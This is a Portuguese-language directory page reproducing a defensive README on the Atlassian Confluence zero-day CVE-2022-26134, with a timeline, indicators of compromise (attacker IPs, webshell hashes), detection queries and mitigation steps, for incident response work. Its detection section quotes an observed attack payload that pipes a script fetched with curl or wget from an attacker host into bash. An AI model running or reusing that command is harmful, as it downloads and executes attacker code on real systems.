Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Confluence-CVE-2022-26134 — Este repositório trata sobre Exploração de Zero-Day do Atlassian Confluence, seu ponto de vista de defesa e análise sob a perspectiva de SecOps ou Blue Team. | Kitploit
Ferramentas/GitHubGitHub/archanchoudhury/confluence-cve-2022-26134
Gerenciamento de Indicadores de Comprometimento (IOC)Análise de VulnerabilidadesExploraçãoAnálise ForenseSegurança WebInteligência de AmeaçasDetecção de IntrusãoAprendizado e EducaçãoResposta a Incidentes

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubarchanchoudhury/confluence-cve-2022-26134

Confluence-CVE-2022-26134

Este repositório trata sobre Exploração de Zero-Day do Atlassian Confluence, seu ponto de vista de defesa e análise sob a perspectiva de SecOps ou Blue Team.

Ver Repositório
438há 4 anosAinda não revisado
Compartilhar

Confluence-CVE-2022-26134

Este repositório aborda a exploração de dia zero do Atlassian Confluence, sob o ponto de vista de defesa e análise de um SecOps ou Blue Team

Índice

  • Sobre
  • Cronologia
  • Entendendo o Exploit
  • Lista de IOCs
  • Estratégia de Detecção
  • Planos de Mitigação
  • Referências

Sobre

Durante o fim de semana do Memorial Day nos Estados Unidos, a Volexity conduziu uma investigação de resposta a incidentes envolvendo dois servidores web voltados para a Internet pertencentes a um de seus clientes que estavam executando o software Atlassian Confluence Server. A investigação começou após a detecção de atividade suspeita nos hosts, que incluía webshells JSP sendo gravados em disco. A Volexity imediatamente usou o Volexity Surge Collect Pro para coletar memória do sistema e arquivos-chave dos sistemas Confluence Server para análise. Após uma revisão aprofundada dos dados coletados, a Volexity conseguiu determinar que o comprometimento do servidor resultou de um invasor lançando um exploit para obter execução remota de código. Posteriormente, a Volexity conseguiu recriar esse exploit e identificar uma vulnerabilidade de dia zero que afeta versões totalmente atualizadas do Confluence Server.

Após a descoberta e verificação dessa vulnerabilidade, a Volexity contatou a Atlassian para relatar os detalhes relevantes em 31 de maio de 2022. A Atlassian desde então confirmou a vulnerabilidade e posteriormente atribuiu o problema ao CVE-2022-26134. Foi confirmado que funciona nas versões atuais do Confluence Server e Data Center.

Cronologia

  • Um comunicado datado de 2 de junho, 13h PT (20h UTC), não descreve a natureza da falha e revela "exploração ativa atual" já detectada. Nenhuma correção está disponível.
  • A Volexity descobre um dia zero no Confluence em 03/06/2022 (GMT)
  • Em 03/06/2022 (GMT) a Atlassian
    • Esclareceu as versões afetadas
    • Adicionou uma regra de WAF
    • Adicionou prazo estimado para as correções estarem disponíveis
  • Em 03/06/2022 vimos tentativas de exploração ativa e PoCs sendo liberados por toda a internet.
  • Em 03 de junho de 2022, 8h PDT (Horário do Pacífico, -7 horas) informações de mitigação da Atlassian incluindo substituição de arquivos jar e class
  • Em 03 de junho de 2022, 10h PDT (Horário do Pacífico, -7 horas) Atlassian atualizou com as versões corrigidas e removeu orientações provisórias sobre adicionar uma regra de WAF.
  • Em 03 de junho de 2022, 16h PDT (Horário do Pacífico, -7 horas) Atlassian atualizou para esclarecer limitação com atualizações contínuas.

Consulte os detalhes técnicos AQUI

Entendendo o Exploit

  • Consulte o Blog da Volexity AQUI para entender todos os detalhes do princípio de funcionamento deste exploit e os detalhes da análise
  • Assista a este VÍDEO para entender o exploit e sua remediação.

Lista de IOCs

  • Por ser uma vulnerabilidade de dia zero e facilmente explorável, não há uma lista exclusiva de IOCs. A partir da pesquisa da comunidade, foi observado que invasores tentaram implantar XMRIG, KINSING, MIRAI, etc. após a exploração.
  • A string de exploit "aparenta" conter esta string ${ Esse padrão não está codificado em URL e NÃO É SEGURO PARA URL, portanto apareceria como: $%7B nos logs.
  • O blog da Volexity faz referência ao arquivo do Confluence: noop.jsp
  • Presença de um webshell com extensão .jsp sem detalhes de caminho. Por exemplo ISTO
  • Alguns endereços IP-
root@kitploit:~
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
  • Hashes de arquivo para noop.jsp malicioso
root@kitploit:~
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
  • Exploração generalizada do Atlassian Confluence CVE-2022-26134, especificamente que é confirmada funcional, foi observada em 4 de junho de 2022. Encontre os IPs exclusivos AQUI

Estratégia de Detecção

  • Se você possui um Confluence Server e Data Center voltado para a internet e sem correção, é prudente interpretar como Comprometido
  • Procure por arquivos NOVOS no caminho do Confluence no disco que tenham extensão .jsp ou qualquer outra.
  • Procure por processos filhos suspeitos dos logs do tomcat
root@kitploit:~
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
  • Procure pela string ${ em (diretório de instalação)/logs/*.log
  • Nos logs de acesso, tente egrep -a -i -f pattern.txt *.log onde pattern.txt deve ser salvo como ${ ou apenas tente grep "\${" caminho do arquivo de log ou tente grep "$%7B" caminho do arquivo de log
  • Você pode ter requisições web chegando para noop.js, então pode tentar findstr -i noop.jsp "logpath"
  • Você pode ter diferentes diretórios de instalação, então tente encontrar $jspname_jsp.java em confluence_install_dir/work/Standalone/. Por exemplo, se você encontrar um shell chamado hack.jsp, você deve ver hack_jsp.java. Se não encontrar hack.jsp mais no disco, tente pivotar nos logs web para procurar acesso a ele. Isso dará o significado de quando foi acessado/excluído.
  • Consulta EQL process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' pode ajudar a identificar conforme descrito por David AQUI
  • Procure por este payload comum bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash nos logs web
  • Uma assinatura do Suricata pode ser encontrada AQUI
  • A configuração de cada um pode ser diferente, mas o Confluence geralmente possui apenas estes arquivos JSP:
root@kitploit:~
./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp

portanto, procure por novos arquivos criados que não estejam listados acima

  • Verifique arquivos no disco não listados e nos logs de acesso com respostas 200. Além disso, verifique se algum desses arquivos foi modificado. Em particular, noop.jsp é popular e geralmente tem cerca de 103 bytes.
  • Se você identificou que o arquivo noop.jsp foi alertado, utilize este SCRIPT para identificar se é suspeito.
  • Você pode usar este SCRIPT para executar uma varredura rápida em seus logs e ver possíveis atores de ameaça. NOTA - A lista de IPs deve ser verificada antes de usar, além disso a lista não é exclusiva.
  • Examine múltiplos casos para procurar arquivos .java no diretório ./confluence/org/apache/jsp/ que não deveriam estar lá.
  • Procure pela árvore de processos e execução de processos em qualquer host onde você identificou tentativa de exploit. Você deve procurar por árvores de processo como: java->bash->python->bash
  • Um processo bash, gerado por um processo python, cujo pai era outro processo bash e então o processo raiz java. Tal tipo de execução deve ser identificado.

Planos de Mitigação

  • A partir do primeiro commit deste repositório, a Atlassian lançou versões corrigidas do Confluence Server e Data Center AQUI
  • Se você não puder atualizar o Confluence imediatamente, como medida temporária, você pode mitigar o problema do CVE-2022-26134 atualizando os seguintes arquivos conforme descrito AQUI
  • Como passo imediato, crie um plano de resposta a incidentes para identificar suas instâncias expostas à Internet e realize a detecção. E coloque o servidor em lista de permissão de IP ou sob VPN para reduzir a superfície de risco.

Referências

  • https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
  • https://www.theregister.com/2022/06/03/atlassian_confluence_critical_flaw_attacked/
  • https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
  • https://www.shodan.io/search?query=x-confluence
  • https://www.shodan.io/search?query=http.favicon.hash%3A-305179312
  • https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/
  • https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
  • https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis?referrer=notificationEmail
  • https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/
Baixar ferramenta